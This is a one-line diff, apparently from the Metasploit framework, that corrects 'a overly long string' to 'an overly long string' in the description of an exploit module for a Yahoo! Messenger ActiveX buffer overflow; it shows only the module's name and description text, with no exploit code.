@@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'Name'           => 'Yahoo! Messenger YVerInfo.dll ActiveX Control Buffer Overflow',
       'Description'    => %q{
           This module exploits a stack buffer overflow in the Yahoo! Messenger ActiveX
-        Control (YVerInfo.dll <= 2006.8.24.1). By sending a overly long string
+        Control (YVerInfo.dll <= 2006.8.24.1). By sending an overly long string
         to the "fvCom()" method from a yahoo.com domain, an attacker may be able
         to execute arbitrary code.
       },
